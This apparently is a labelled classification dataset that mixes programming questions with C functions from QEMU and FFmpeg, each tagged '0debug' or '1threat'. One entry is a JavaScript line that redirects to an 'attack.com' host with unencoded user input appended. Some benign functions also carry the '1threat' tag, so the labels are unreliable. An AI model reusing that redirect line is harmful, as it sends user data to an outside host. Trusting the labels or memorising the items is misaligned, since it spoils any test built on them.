C++ unordered_map insert into vector : <p>I am trying to write a program which will take a list of strings as input and create a hash table with each string and its positions.</p> <p>Example:<br> vector words {"first", "second", "third", "forth", "second"};</p> <p>output:<br> first 1<br> second 2,5<br> third 3<br> forth 4 </p> <p>I am facing two problems; please find them in the code comments below.<br> Please tell me what I am doing wrong.</p> <pre><code>int main() { vector&lt;string&gt; words {"first", "second", "third", "forth", "second"}; unordered_map&lt;string, vector&lt;int&gt;&gt; hash_table; unordered_map&lt;string, vector&lt;int&gt;&gt;::const_iterator hash_it; int loc = 1; for(auto n = words.begin(); n != words.end(); ++n){ hash_it = hash_table.find(*n); if(hash_it == hash_table.end()) hash_table.insert(make_pair(*n, vector&lt;int&gt; (loc))); else //hash_it-&gt;second.push_back(loc); //Problem 1 - this statement gives error ++loc; } for(auto&amp; n:hash_table){ cout&lt;&lt;"Word - "&lt;&lt;n.first&lt;&lt;" Loc -"; vector&lt;int&gt; tmp1 = n.second; for(auto j = tmp1.begin(); j != tmp1.end(); ++j) cout&lt;&lt;" "&lt;&lt;*j; cout&lt;&lt;endl; } } </code></pre> <p>Problem 2 - location values are 0<br> Output of program -<br> Word - forth Loc - 0<br> Word - third Loc - 0<br> Word - second Loc - 0<br> Word - first Loc - 0 </p>
0debug
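One plausible reading of the two problems in the question above: a `const_iterator` cannot mutate the mapped vector (Problem 1), and with the `push_back` commented out, `++loc` became the `else` body, so `loc` never advanced; on top of that, `vector&lt;int&gt;(loc)` is the size constructor (loc zero-filled elements), which is why every printed location was 0 (Problem 2). A corrected sketch, assuming the same word list as the question:

```cpp
#include <cassert>
#include <string>
#include <unordered_map>
#include <vector>

// Map each word to the (1-based) positions at which it occurs.
std::unordered_map<std::string, std::vector<int>>
index_words(const std::vector<std::string>& words)
{
    std::unordered_map<std::string, std::vector<int>> table;
    int loc = 1;
    for (const auto& w : words) {
        // operator[] default-constructs an empty vector the first time w is
        // seen, so the find/insert split in the question is unnecessary.
        table[w].push_back(loc);
        ++loc;  // must advance on every word, not only in one branch
    }
    return table;
}
```

With the question's input, `index_words` yields `second -> {2, 5}`, matching the desired output.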
SQL query to get all rows if there is no matching row in a left join : I have a table structure like this: person (pid, pname) personSamples(sid,pid,sampleName) groups(gid,groupName) groupPersons(gpid,gid,pid) grouppersonSamples(gpsid,gid,sid) Whenever a person is added to a group, i.e. a row in the groupPersons table, I add some selected samples of that person to the grouppersonSamples table. The requirement is: if no row was inserted into grouppersonSamples, then select everything from personSamples for the given person and group. Currently I left join with grouppersonSamples and, if there is no matching row, execute a second query to select all from personSamples for the given pid. Is there any way to get all of this in a single query?
0debug
static int graph_config_formats(AVFilterGraph *graph, AVClass *log_ctx) { int ret; if ((ret = query_formats(graph, log_ctx)) < 0) return ret; reduce_formats(graph); swap_sample_fmts(graph); swap_samplerates(graph); swap_channel_layouts(graph); if ((ret = pick_formats(graph)) < 0) return ret; return 0; }
1threat
How to call the main function from another header file's cpp file : I want to call the main function from another header file's cpp file, where main.cpp includes that header. Can I call main.cpp's main from the header file's cpp? This is main.cpp: ``` #include "another.h" int main() { cout<<"Main"; } ``` This is another.h: ```class another { public: void another_func(void); }; ``` This is another_func.cpp, a separate file: ```void another::another_func(void) { //how do i call main() } ```
0debug
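Calling `main()` from other code is ill-formed C++ (the standard forbids taking the address of or calling `main`). The usual fix for the situation in the question above is to move the shared work out of `main` into an ordinary function that both `main` and `another::another_func` can call. A sketch; `main_work` is an invented name, not part of the question's code:

```cpp
#include <cassert>
#include <iostream>
#include <string>

// another.h from the question
class another {
public:
    void another_func();
};

// The logic that used to live directly in main(), extracted into an
// ordinary function that any translation unit may call.
std::string main_work()
{
    return "Main";
}

void another::another_func()
{
    // Calling ::main() here would be ill-formed C++;
    // call the extracted helper instead.
    std::cout << main_work() << '\n';
}

// main.cpp then shrinks to:
//   int main() { std::cout << main_work(); }
```

This keeps `main` trivial and makes the behaviour reusable and testable from anywhere.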
window.location.href = 'http://attack.com?user=' + user_input;
1threat
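The one-liner above concatenates raw user input into a URL, the classic injection shape. A hedged sketch of the standard mitigation, encoding the value before concatenation (`safeUserUrl` and the example host are illustrative):

```javascript
// Unencoded input lets an attacker smuggle extra query parameters (or worse)
// into the URL; encodeURIComponent neutralises the metacharacters.
function safeUserUrl(base, user_input) {
  return base + '?user=' + encodeURIComponent(user_input);
}

const url = safeUserUrl('https://example.com/page', 'alice&admin=true');
console.log(url); // https://example.com/page?user=alice%26admin%3Dtrue
```

The `&` and `=` in the input come out as `%26` and `%3D`, so they can no longer introduce a second query parameter.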
static void mirror_drain(MirrorBlockJob *s) { while (s->in_flight > 0) { mirror_wait_for_io(s); } }
1threat
How to configure ASP.net Core server routing for multiple SPAs hosted with SpaServices : <p>I have an Angular 5 application that I want to host with Angular Universal on ASP.net Core using the latest <a href="https://docs.microsoft.com/en-us/aspnet/core/spa/angular" rel="noreferrer">Angular template RC</a>. I've followed the docs and have the application up and running. The problem is that I am also using Angular's <a href="https://angular.io/guide/i18n" rel="noreferrer">i18n tools</a>, which produce multiple compiled applications, 1 per locale. I need to be able to host each from <code>https://myhost.com/{locale}/</code>.</p> <p>I know that I can spin up an instance of the ASP.net Core app for each locale, and set up hosting in the webserver to have the appropriate paths route to the associated app, but this seems excessive to me.</p> <p>Routes are configured with:</p> <pre class="lang-cs prettyprint-override"><code>// app is an instance of Microsoft.AspNetCore.Builder.IApplicationBuilder app.UseMvc(routes =&gt; { routes.MapRoute( name: "default", template: "{controller}/{action=Index}/{id?}"); }); </code></pre> <p>SpaServices are configured with:</p> <pre class="lang-cs prettyprint-override"><code>app.UseSpa(spa =&gt; { // To learn more about options for serving an Angular SPA from ASP.NET Core, // see https://go.microsoft.com/fwlink/?linkid=864501 spa.Options.SourcePath = "ClientApp"; spa.UseSpaPrerendering(options =&gt; { options.BootModulePath = $"{spa.Options.SourcePath}/dist-server/main.bundle.js"; options.BootModuleBuilder = env.IsDevelopment() ? 
new AngularCliBuilder(npmScript: "build:ssr:en") : null; options.ExcludeUrls = new[] { "/sockjs-node" }; options.SupplyData = (context, data) =&gt; { data["foo"] = "bar"; }; }); if (env.IsDevelopment()) { spa.UseAngularCliServer(npmScript: "start"); } }); </code></pre> <p>I've looked through the documentation and the source on Github, and I cannot find how to configure ASP.net Core to associate a specific route with a given SPA. Anyone have any ideas?</p>
0debug
JavaScript Regex Global Replace Not Working : Disclaimer: I am not a regex user; my solution came from another Stack Overflow question. I am at wit's end as to why this does not work (tested on node). I am trying to replace all instances of "RADAL...^" with a space: ------------------------------------------------ txt = "RADALL^follow up blah blah- Pt continues on ~RADALL4^ test it now"; txt = txt.replace(/RADAL.\^/g, " "); ------------------------------------------------ returns --> follow up blah blah- Pt continues on ~RADALL4^ test it now I have also looped "while txt.search("RADAL") > -1" followed by the txt.replace(...), but it still only removes the first occurrence and loops forever, since the second is never removed. Any help would be greatly appreciated!
0debug
I am searching for a spell checker which is easily implemented to work with django and python 2.7 : <p>I want to check for a spelling mistakes while user is typing and it should support different languages. Thanks for your help guys</p>
0debug
How to update a single firebase firestore document : <p>After authenticating i'm trying to lookup a user document at /users/, then i'd like to update the document with data from auth object as well some custom user properties. But I'm getting an error that the update method doesn't exist. Is there a way to update a single document? All the firestore doc examples assume you have the actual doc id, and they don't have any examples querying with a where clause. </p> <pre><code>firebase.firestore().collection("users").where("uid", "==", payload.uid) .get() .then(function(querySnapshot) { querySnapshot.forEach(function(doc) { console.log(doc.id, " =&gt; ", doc.data()); doc.update({foo: "bar"}) }); }) </code></pre>
0debug
linux Uinsg write command to communicate with other users : I am learning linux and I am learning how to communicate with other users in addition, I am using ubuntu and I already have a existing user and when I try to use the command write to communicate with other user write lex pts/5 a error pop out, write: you are uid 1000, but your login is as uid 1001 I thought the shell will allow communication in different uid, so it cannot? is there any ways to fix this? Thank
0debug
Get json from php to android : I cant give jason from php to android I want send data to php and insert to database and give json data after insert database in android insert database process is true but i cant give json data in android! I use AsyncTask in this code please help me try { //connect to php and send data code... HttpResponse response = httpclient.execute(httppost); InputStream inputStream = response.getEntity().getContent(); String result = convertInputStreamToString(inputStream); if (result != null) { try { JSONObject json = new JSONObject(result); Log.i("json", json.getString("insert_sucss")); if (json.has("insert_err")) { Toast.makeText(RegisterActivity.this, json.getString("insert_err"), Toast.LENGTH_LONG).show(); } if (json.has("insert_sucss")) { Toast.makeText(RegisterActivity.this, json.getString("insert_sucss"), Toast.LENGTH_LONG).show(); } } catch (JSONException e) { e.printStackTrace(); } } } catch (Exception e) { Log.e("log_tag", "Error: " + e.toString()); } return null; } private String convertInputStreamToString(InputStream inputStream) { try { BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); StringBuilder builder = new StringBuilder(); String line = ""; while ((line = reader.readLine()) != null) { builder.append(line); } return builder.toString(); } catch (IOException e) { e.printStackTrace(); } return null; }
0debug
roundAndPackFloat128( flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1, uint64_t zSig2 STATUS_PARAM) { int8 roundingMode; flag roundNearestEven, increment, isTiny; roundingMode = STATUS(float_rounding_mode); roundNearestEven = ( roundingMode == float_round_nearest_even ); increment = ( (int64_t) zSig2 < 0 ); if ( ! roundNearestEven ) { if ( roundingMode == float_round_to_zero ) { increment = 0; } else { if ( zSign ) { increment = ( roundingMode == float_round_down ) && zSig2; } else { increment = ( roundingMode == float_round_up ) && zSig2; } } } if ( 0x7FFD <= (uint32_t) zExp ) { if ( ( 0x7FFD < zExp ) || ( ( zExp == 0x7FFD ) && eq128( LIT64( 0x0001FFFFFFFFFFFF ), LIT64( 0xFFFFFFFFFFFFFFFF ), zSig0, zSig1 ) && increment ) ) { float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR); if ( ( roundingMode == float_round_to_zero ) || ( zSign && ( roundingMode == float_round_up ) ) || ( ! zSign && ( roundingMode == float_round_down ) ) ) { return packFloat128( zSign, 0x7FFE, LIT64( 0x0000FFFFFFFFFFFF ), LIT64( 0xFFFFFFFFFFFFFFFF ) ); } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( zExp < 0 ) { if ( STATUS(flush_to_zero) ) return packFloat128( zSign, 0, 0, 0 ); isTiny = ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) || ( zExp < -1 ) || ! 
increment || lt128( zSig0, zSig1, LIT64( 0x0001FFFFFFFFFFFF ), LIT64( 0xFFFFFFFFFFFFFFFF ) ); shift128ExtraRightJamming( zSig0, zSig1, zSig2, - zExp, &zSig0, &zSig1, &zSig2 ); zExp = 0; if ( isTiny && zSig2 ) float_raise( float_flag_underflow STATUS_VAR); if ( roundNearestEven ) { increment = ( (int64_t) zSig2 < 0 ); } else { if ( zSign ) { increment = ( roundingMode == float_round_down ) && zSig2; } else { increment = ( roundingMode == float_round_up ) && zSig2; } } } } if ( zSig2 ) STATUS(float_exception_flags) |= float_flag_inexact; if ( increment ) { add128( zSig0, zSig1, 0, 1, &zSig0, &zSig1 ); zSig1 &= ~ ( ( zSig2 + zSig2 == 0 ) & roundNearestEven ); } else { if ( ( zSig0 | zSig1 ) == 0 ) zExp = 0; } return packFloat128( zSign, zExp, zSig0, zSig1 ); }
1threat
aws-sdk: crash after updating from angular5 to angular6 : <p>I just updated to Angular 6.0 from Angular 5.2, my code now break with this error:</p> <pre><code>core.js:1601 ERROR Error: Uncaught (in promise): ReferenceError: global is not defined ReferenceError: global is not defined at Object../node_modules/buffer/index.js (index.js:43) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHashUtils.js (browserHashUtils.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHmac.js (browserHmac.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserCryptoLib.js (browserCryptoLib.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browser_loader.js (browser_loader.js:4) at __webpack_require__ (bootstrap:81) at Object../node_modules/buffer/index.js (index.js:43) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHashUtils.js (browserHashUtils.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserHmac.js (browserHmac.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browserCryptoLib.js (browserCryptoLib.js:1) at __webpack_require__ (bootstrap:81) at Object../node_modules/aws-sdk/lib/browser_loader.js (browser_loader.js:4) at __webpack_require__ (bootstrap:81) </code></pre> <p>anybody knows the problem? I have tried ng update but seems like aws-sdk-js doesn’t provide the schematics for updating</p>
0debug
static void update(NUTContext *nut, int stream_index, int64_t frame_start, int frame_type, int frame_code, int key_frame, int size, int64_t pts){ StreamContext *stream= &nut->stream[stream_index]; stream->last_key_frame= key_frame; nut->last_frame_start[ frame_type ]= frame_start; update_lru(stream->lru_pts_delta, pts - stream->last_pts, 3); update_lru(stream->lru_size , size, 2); stream->last_pts= pts; if( nut->frame_code[frame_code].flags & FLAG_PTS && nut->frame_code[frame_code].flags & FLAG_FULL_PTS) stream->last_full_pts= pts; }
1threat
password validation with yup and formik : <p>how would one go about having password validation but at the same time having the errors be passed to different variables? </p> <p>i.e </p> <pre><code>password: Yup.string().required("Please provide a valid password"), passwordMin: Yup.string().oneOf([Yup.ref('password'), null]).min(8, 'Error'), passwordLC: Yup.string().oneOf([Yup.ref('password'), null]).matches(/[a-z]/, "Error" ) passwordUC: Yup.string().oneOf([Yup.ref('password'), null]).matches(/[A-Z]/, "Error" ) </code></pre> <p>I cant get the binding of the password variables to bind with the password object</p>
0debug
Is it possible to send SMS over Wifi in Android App? : I'm working on an Android application in Android Studio and wanted to add a feature that allowed a text (SMS) message to be sent from the application to a mobile phone number. I found one way to do this by using the SMS Manager API, but it seems like this only works if the application is run on a cell phone with a SIM Card/Data plan. I'd like the user to be able to send a text over WiFi in case they're running the application on a tablet with only WiFi or another device that only has access to a WiFi connection. The application would only send messages to a mobile number, and doesn't need to worry about receiving texts back from said mobile number. My initial research proves that it is not possible to send SMS messages over WiFi. My question is, is this actually the case? Or does anyone know of a way to do this over a WiFi connection? Even if I don't use SMS, I'd like some other way to get a message from the device to a mobile phone number. I just figured that SMS would be the most straight forward. Thanks for your time!
0debug
My simple webview application is suspended on googleplayconsole now how can i publish again or remove it.? : <p>before yesterday i uploaded my application and yesterday i get this response</p> <blockquote> <p>An email with details about the removal has been sent to the account owner at myEmail@gmail.com. Before uploading any new applications, please review the Developer Distribution Agreement and Developer Program Policies. If you feel we have made this determination in error, you can visit this Google Play Help Center article to learn how you can appeal against the removal.</p> </blockquote> <p>and solve this errors and now again upload application and now i get this error.</p> <blockquote> <p>You need to use a different package name because "com.app.my_appliaction_name" is already used by one of your other applications.</p> </blockquote>
0debug
static int openfile(char *name, int flags, int growable, QDict *opts) { Error *local_err = NULL; if (qemuio_bs) { fprintf(stderr, "file open already, try 'help close'\n"); return 1; } if (growable) { if (bdrv_open(&qemuio_bs, name, NULL, opts, flags | BDRV_O_PROTOCOL, NULL, &local_err)) { fprintf(stderr, "%s: can't open device %s: %s\n", progname, name, error_get_pretty(local_err)); error_free(local_err); return 1; } } else { qemuio_bs = bdrv_new("hda", &error_abort); if (bdrv_open(&qemuio_bs, name, NULL, opts, flags, NULL, &local_err) < 0) { fprintf(stderr, "%s: can't open device %s: %s\n", progname, name, error_get_pretty(local_err)); error_free(local_err); bdrv_unref(qemuio_bs); qemuio_bs = NULL; return 1; } } return 0; }
1threat
static void xics_kvm_realize(DeviceState *dev, Error **errp) { KVMXICSState *icpkvm = KVM_XICS(dev); XICSState *icp = XICS_COMMON(dev); int i, rc; Error *error = NULL; struct kvm_create_device xics_create_device = { .type = KVM_DEV_TYPE_XICS, .flags = 0, }; if (!kvm_enabled() || !kvm_check_extension(kvm_state, KVM_CAP_IRQ_XICS)) { error_setg(errp, "KVM and IRQ_XICS capability must be present for in-kernel XICS"); goto fail; } spapr_rtas_register(RTAS_IBM_SET_XIVE, "ibm,set-xive", rtas_dummy); spapr_rtas_register(RTAS_IBM_GET_XIVE, "ibm,get-xive", rtas_dummy); spapr_rtas_register(RTAS_IBM_INT_OFF, "ibm,int-off", rtas_dummy); spapr_rtas_register(RTAS_IBM_INT_ON, "ibm,int-on", rtas_dummy); rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_SET_XIVE, "ibm,set-xive"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,set-xive"); goto fail; } rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_GET_XIVE, "ibm,get-xive"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,get-xive"); goto fail; } rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_INT_ON, "ibm,int-on"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,int-on"); goto fail; } rc = kvmppc_define_rtas_kernel_token(RTAS_IBM_INT_OFF, "ibm,int-off"); if (rc < 0) { error_setg(errp, "kvmppc_define_rtas_kernel_token: ibm,int-off"); goto fail; } rc = kvm_vm_ioctl(kvm_state, KVM_CREATE_DEVICE, &xics_create_device); if (rc < 0) { error_setg_errno(errp, -rc, "Error on KVM_CREATE_DEVICE for XICS"); goto fail; } icpkvm->kernel_xics_fd = xics_create_device.fd; object_property_set_bool(OBJECT(icp->ics), true, "realized", &error); if (error) { error_propagate(errp, error); goto fail; } assert(icp->nr_servers); for (i = 0; i < icp->nr_servers; i++) { object_property_set_bool(OBJECT(&icp->ss[i]), true, "realized", &error); if (error) { error_propagate(errp, error); goto fail; } } kvm_kernel_irqchip = true; kvm_irqfds_allowed = true; kvm_msi_via_irqfd_allowed = true; 
kvm_gsi_direct_mapping = true; return; fail: kvmppc_define_rtas_kernel_token(0, "ibm,set-xive"); kvmppc_define_rtas_kernel_token(0, "ibm,get-xive"); kvmppc_define_rtas_kernel_token(0, "ibm,int-on"); kvmppc_define_rtas_kernel_token(0, "ibm,int-off"); }
1threat
static int draw_text(AVFilterContext *ctx, AVFilterBufferRef *picref, int width, int height) { DrawTextContext *dtext = ctx->priv; uint32_t code = 0, prev_code = 0; int x = 0, y = 0, i = 0, ret; int max_text_line_w = 0, len; int box_w, box_h; char *text = dtext->text; uint8_t *p; int y_min = 32000, y_max = -32000; int x_min = 32000, x_max = -32000; FT_Vector delta; Glyph *glyph = NULL, *prev_glyph = NULL; Glyph dummy = { 0 }; time_t now = time(0); struct tm ltime; uint8_t *buf = dtext->expanded_text; int buf_size = dtext->expanded_text_size; if(dtext->basetime != AV_NOPTS_VALUE) now= picref->pts*av_q2d(ctx->inputs[0]->time_base) + dtext->basetime/1000000; if (!buf) { buf_size = 2*strlen(dtext->text)+1; buf = av_malloc(buf_size); } #if HAVE_LOCALTIME_R localtime_r(&now, &ltime); #else if(strchr(dtext->text, '%')) ltime= *localtime(&now); #endif do { *buf = 1; if (strftime(buf, buf_size, dtext->text, &ltime) != 0 || *buf == 0) break; buf_size *= 2; } while ((buf = av_realloc(buf, buf_size))); if (dtext->tc_opt_string) { char tcbuf[AV_TIMECODE_STR_SIZE]; av_timecode_make_string(&dtext->tc, tcbuf, dtext->frame_id++); buf = av_asprintf("%s%s", dtext->text, tcbuf); } if (!buf) return AVERROR(ENOMEM); text = dtext->expanded_text = buf; dtext->expanded_text_size = buf_size; if ((len = strlen(text)) > dtext->nb_positions) { if (!(dtext->positions = av_realloc(dtext->positions, len*sizeof(*dtext->positions)))) return AVERROR(ENOMEM); dtext->nb_positions = len; } x = 0; y = 0; for (i = 0, p = text; *p; i++) { GET_UTF8(code, *p++, continue;); dummy.code = code; glyph = av_tree_find(dtext->glyphs, &dummy, glyph_cmp, NULL); if (!glyph) { load_glyph(ctx, &glyph, code); } y_min = FFMIN(glyph->bbox.yMin, y_min); y_max = FFMAX(glyph->bbox.yMax, y_max); x_min = FFMIN(glyph->bbox.xMin, x_min); x_max = FFMAX(glyph->bbox.xMax, x_max); } dtext->max_glyph_h = y_max - y_min; dtext->max_glyph_w = x_max - x_min; glyph = NULL; for (i = 0, p = text; *p; i++) { GET_UTF8(code, *p++, continue;); 
if (prev_code == '\r' && code == '\n') continue; prev_code = code; if (is_newline(code)) { max_text_line_w = FFMAX(max_text_line_w, x); y += dtext->max_glyph_h; x = 0; continue; } prev_glyph = glyph; dummy.code = code; glyph = av_tree_find(dtext->glyphs, &dummy, glyph_cmp, NULL); if (dtext->use_kerning && prev_glyph && glyph->code) { FT_Get_Kerning(dtext->face, prev_glyph->code, glyph->code, ft_kerning_default, &delta); x += delta.x >> 6; } dtext->positions[i].x = x + glyph->bitmap_left; dtext->positions[i].y = y - glyph->bitmap_top + y_max; if (code == '\t') x = (x / dtext->tabsize + 1)*dtext->tabsize; else x += glyph->advance; } max_text_line_w = FFMAX(x, max_text_line_w); dtext->var_values[VAR_TW] = dtext->var_values[VAR_TEXT_W] = max_text_line_w; dtext->var_values[VAR_TH] = dtext->var_values[VAR_TEXT_H] = y + dtext->max_glyph_h; dtext->var_values[VAR_MAX_GLYPH_W] = dtext->max_glyph_w; dtext->var_values[VAR_MAX_GLYPH_H] = dtext->max_glyph_h; dtext->var_values[VAR_MAX_GLYPH_A] = dtext->var_values[VAR_ASCENT ] = y_max; dtext->var_values[VAR_MAX_GLYPH_D] = dtext->var_values[VAR_DESCENT] = y_min; dtext->var_values[VAR_LINE_H] = dtext->var_values[VAR_LH] = dtext->max_glyph_h; dtext->x = dtext->var_values[VAR_X] = av_expr_eval(dtext->x_pexpr, dtext->var_values, &dtext->prng); dtext->y = dtext->var_values[VAR_Y] = av_expr_eval(dtext->y_pexpr, dtext->var_values, &dtext->prng); dtext->x = dtext->var_values[VAR_X] = av_expr_eval(dtext->x_pexpr, dtext->var_values, &dtext->prng); dtext->draw = av_expr_eval(dtext->draw_pexpr, dtext->var_values, &dtext->prng); if(!dtext->draw) return 0; box_w = FFMIN(width - 1 , max_text_line_w); box_h = FFMIN(height - 1, y + dtext->max_glyph_h); if (dtext->draw_box) ff_blend_rectangle(&dtext->dc, &dtext->boxcolor, picref->data, picref->linesize, width, height, dtext->x, dtext->y, box_w, box_h); if (dtext->shadowx || dtext->shadowy) { if ((ret = draw_glyphs(dtext, picref, width, height, dtext->shadowcolor.rgba, &dtext->shadowcolor, 
dtext->shadowx, dtext->shadowy)) < 0) return ret; } if ((ret = draw_glyphs(dtext, picref, width, height, dtext->fontcolor.rgba, &dtext->fontcolor, 0, 0)) < 0) return ret; return 0; }
1threat
static av_cold int xwd_encode_close(AVCodecContext *avctx) { av_freep(&avctx->coded_frame); return 0; }
1threat
static int kvm_dirty_pages_log_change(target_phys_addr_t phys_addr, target_phys_addr_t end_addr, unsigned flags, unsigned mask) { KVMState *s = kvm_state; KVMSlot *mem = kvm_lookup_slot(s, phys_addr); if (mem == NULL) { dprintf("invalid parameters %llx-%llx\n", phys_addr, end_addr); return -EINVAL; } flags = (mem->flags & ~mask) | flags; if (flags == mem->flags) return 0; mem->flags = flags; return kvm_set_user_memory_region(s, mem); }
1threat
net core api controller unit testing using xunit and moq : <p>i have some api controller methods that i would like to add some unit tests to. I am using xunit and moq and writing in c# using asp net core.</p> <p>example of one method is:</p> <pre><code>public async Task&lt;ActionResult&lt;List&lt;StatusDTO&gt;&gt;&gt; Get() { return await _statusservice.GetStatusesAsync(); } </code></pre> <p>at this point in time my controller method is simply returning the dto that the service layer method is returning. In future it might change to return a specific viewmodel.</p> <p>i have read <a href="https://docs.microsoft.com/en-us/aspnet/core/mvc/controllers/testing?view=aspnetcore-2.2" rel="nofollow noreferrer">https://docs.microsoft.com/en-us/aspnet/core/mvc/controllers/testing?view=aspnetcore-2.2</a> to get some guidance on testing controllers.</p> <p>My question is : for example above would the unit test just consist of - checking that the return type is <code>ActionResult&lt;StatusDTO&gt;</code> and/or (using moq) verifying the service method has been called. </p> <p>Should i set up my service method to return a mock <code>StatusDTO</code> and do some assertions against that. I don't see benefit of that in this situation, as that would be testing the service method wouldn't it and i would cover that in the service method tests.</p> <p>Sorry if this seems quite basic - my knowledge and experience in writing unit tests is very limited. Thanks for any help.</p>
0debug
EC2 or S3 to host AngularJS app? : <p>I want to launch a production version of an AngularJS application, and I find Amazon AWS to be an awesome hosting suite. As AngularJS is essentially static it could be hosted on S3 storage, or on an EC2 server with node.js backend. </p> <p>Either of these solutions would suit my deployment method, so the question is, will I (in theory) get better performance from one or the other, and why? Is there anything wrong with hosting a professional website frontend on S3? Does anyone have any experience with both methods? The site involves streaming audio, video and potentially many many users. </p> <p>Any advice appreciated. </p>
0debug
which is the best gem for push notifications on android with ruby on rails 4+? : <p>actually, i want to send push notification on submit button. when the user presses the button then on the android phone getting a push notification.</p>
0debug
How do I make background code? : <p>I want to make background code that checks if someone hit "H","D", or other letters. Like This,(I mean a background code that is checking this.)</p> <pre><code>if(e.KeyCode == Keys.U) { code; } </code></pre>
0debug
truncating last two characters from SQL MST 2014 : This will seem rudimentary but trying the substring command to no avail. Using substring('indcode',1,4). The values are 6 characters long and I need the last two deleted from them. In short, I need them truncated from 6 to 4. Also, in the table indcode is set as a char(6). Could that be why I get an incorrect syntax error when I use that subtring command?
0debug
static void cmd_inquiry(IDEState *s, uint8_t *buf) { int max_len = buf[4]; buf[0] = 0x05; buf[1] = 0x80; buf[2] = 0x00; buf[3] = 0x21; buf[4] = 31; buf[5] = 0; buf[6] = 0; buf[7] = 0; padstr8(buf + 8, 8, "QEMU"); padstr8(buf + 16, 16, "QEMU DVD-ROM"); padstr8(buf + 32, 4, s->version); ide_atapi_cmd_reply(s, 36, max_len); }
1threat
Formatting hours and minutes in django backend : <p>I have a method in my django app (1.8).</p> <p>From date recived from <strong>date_start</strong> field: <code>2017-01-26 18:00:00+00:00</code> I want to get hours and minutes. But my code didn't works:</p> <pre><code>@property def time(self): return '{%H:%M}'.format(self.date_start) </code></pre>
0debug
int ram_save_live(Monitor *mon, QEMUFile *f, int stage, void *opaque) { ram_addr_t addr; uint64_t bytes_transferred_last; double bwidth = 0; uint64_t expected_time = 0; if (stage < 0) { cpu_physical_memory_set_dirty_tracking(0); return 0; } if (cpu_physical_sync_dirty_bitmap(0, TARGET_PHYS_ADDR_MAX) != 0) { qemu_file_set_error(f, -EINVAL); return 0; } if (stage == 1) { RAMBlock *block; bytes_transferred = 0; last_block = NULL; last_offset = 0; sort_ram_list(); QLIST_FOREACH(block, &ram_list.blocks, next) { for (addr = block->offset; addr < block->offset + block->length; addr += TARGET_PAGE_SIZE) { if (!cpu_physical_memory_get_dirty(addr, MIGRATION_DIRTY_FLAG)) { cpu_physical_memory_set_dirty(addr); } } } cpu_physical_memory_set_dirty_tracking(1); qemu_put_be64(f, ram_bytes_total() | RAM_SAVE_FLAG_MEM_SIZE); QLIST_FOREACH(block, &ram_list.blocks, next) { qemu_put_byte(f, strlen(block->idstr)); qemu_put_buffer(f, (uint8_t *)block->idstr, strlen(block->idstr)); qemu_put_be64(f, block->length); } } bytes_transferred_last = bytes_transferred; bwidth = qemu_get_clock_ns(rt_clock); while (!qemu_file_rate_limit(f)) { int bytes_sent; bytes_sent = ram_save_block(f); bytes_transferred += bytes_sent; if (bytes_sent == 0) { break; } } bwidth = qemu_get_clock_ns(rt_clock) - bwidth; bwidth = (bytes_transferred - bytes_transferred_last) / bwidth; if (bwidth == 0) { bwidth = 0.000001; } if (stage == 3) { int bytes_sent; while ((bytes_sent = ram_save_block(f)) != 0) { bytes_transferred += bytes_sent; } cpu_physical_memory_set_dirty_tracking(0); } qemu_put_be64(f, RAM_SAVE_FLAG_EOS); expected_time = ram_save_remaining() * TARGET_PAGE_SIZE / bwidth; return (stage == 2) && (expected_time <= migrate_max_downtime()); }
1threat
Python "equal to" and "not equal to" : <p>I was doing a practice question and couldn't figure out what I was doing wrong. Seems I was a little confused about how <code>or</code> should work.</p> <p>I'll pass both a range of numbers from 13 - 19:</p> <pre><code>for i in range(13,20): func(i) </code></pre> <blockquote> <p>Function 1</p> </blockquote> <pre><code>def func(n): if n == 15 or n == 16: pass else: n = 0 </code></pre> <blockquote> <p>Result 1</p> </blockquote> <pre><code>0 0 15 16 0 0 0 </code></pre> <p>So if n is equal to 15 or if <code>n</code> is equal to 16, pass. Anything else, make it 0. Makes sense.</p> <blockquote> <p>Function 2</p> </blockquote> <pre><code>def func(n): if n != 15 and n != 16: n = 0 else: pass </code></pre> <blockquote> <p>Result 2</p> </blockquote> <pre><code>0 0 15 16 0 0 0 </code></pre> <p>If <code>n</code> is not equal to 15 or 16, make it 0. Else, pass. Again, makes sense.</p> <p>Here's where I get a little unstuck:</p> <blockquote> <p>Function 3</p> </blockquote> <pre><code>def func(n): if n == 15 and n == 16: pass else: n = 0 </code></pre> <blockquote> <p>Result 3</p> </blockquote> <pre><code>0 0 0 0 0 0 0 </code></pre> <p><em>I think</em> the result is due to both conditions for <code>n</code> needing to be met; if is equal both 15 <strong>and</strong> 16, pass, else make it zero. I get that.</p> <blockquote> <p>Function 4</p> </blockquote> <pre><code>def func(n): if n != 15 or n != 16: n = 0 else: pass </code></pre> <blockquote> <p>Result 4</p> </blockquote> <pre><code>0 0 0 0 0 0 0 </code></pre> <p>If <code>n</code> is not equal 15 or <code>n</code> is not equal to 16, then it should be zero. </p> <p><em>I think</em> this means <code>or</code> somehow works the same way as <code>and</code> in that both conditions must be met, but was wondering if someone more knowledgeable could explain?</p>
0debug
